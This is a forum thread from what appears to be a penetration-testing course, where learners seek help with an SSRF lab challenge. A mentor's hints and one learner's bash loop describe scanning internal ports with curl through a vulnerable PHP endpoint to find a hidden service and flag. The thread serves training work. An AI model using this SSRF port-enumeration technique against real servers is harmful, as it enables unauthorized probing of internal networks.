Struggling with SSRF 1.3 Challenge Exercise

Career Paths Penetration Tester
1

I managed to get through 1.1 and 1.2 of the SSRF stuff.

It’s quite confusing and I feel like I need a little more instruction or a cheeky hint on where I need to go to get the flag in 1.3.

I can’t seem to figure it out, I know which port it is, and I also know the file, but I can’t access the file because I get a 403 forbidden. At least I think I know these things?

The Pen Testing Career Path has been good so far but this one is confusing me (I think it might be a bit too blunt in instructions?).

Any help would be great!

2

Okay I did find the flag, but I’m not really sure I did it the “right” way, if that makes sense?

I made a little script and did it through the console, but previous lessons were through the php web page example.

Just pretty confused but still managed it so yay?

3

same issue, i do not understand what to do

if i type http://ssrf.challenge2:22/test2.html

i receive
1

if i type http://ssrf.challenge2:80/test2.html

i receive

2

so seems both port 22 and 80 are alive but so what ? does not help to retrieve any flag ?

SSRF3 page allow to enumerate port, not to run scripts ?

or should i try to use a script like:

bash

for i in {1..10}; do curl -s "http://ssrf.challenge2:$i/test2.html" sleep 1 done

i have no idea, can someone help

4

hi there, having the same issue as @Hoele here.

SSRF_3
SSRF_31238×876 55.3 KB

Enumerating port 80 says - you don’t have permission to access this resource. Not sure how to proceed. Any pointers?

SSRF_3-1
SSRF_3-11343×231 20.1 KB

SSRF_3-2
SSRF_3-2419×788 33.4 KB

Also, tried enumerating the ports 1-100 using the Curl command but no response there either.

5

You are all close. In the lab you did everything in Firefox, but you can’t solve this in Firefox unless you want to make 100 entries into that webform :slight_smile: Time to break out some command-line fu! :martial_arts_uniform:

1.) You need a for loop from 1 to 100. This is the port you will test.
2.) Use curl with --no-progress-meter for best results
3.) The URL is http://ssrf.example3/examples/ssrf3.php?file=ssrf.challenge2: followed by the port in the for loop.

I would send the output to a file (be sure to append >> not overwrite >) then look for connection output from a hidden service in that file. The flag is found in the connection output.

1 Like
6

thank you @JosephWhite for the pointers. I was able to retrieve the flag.

1 Like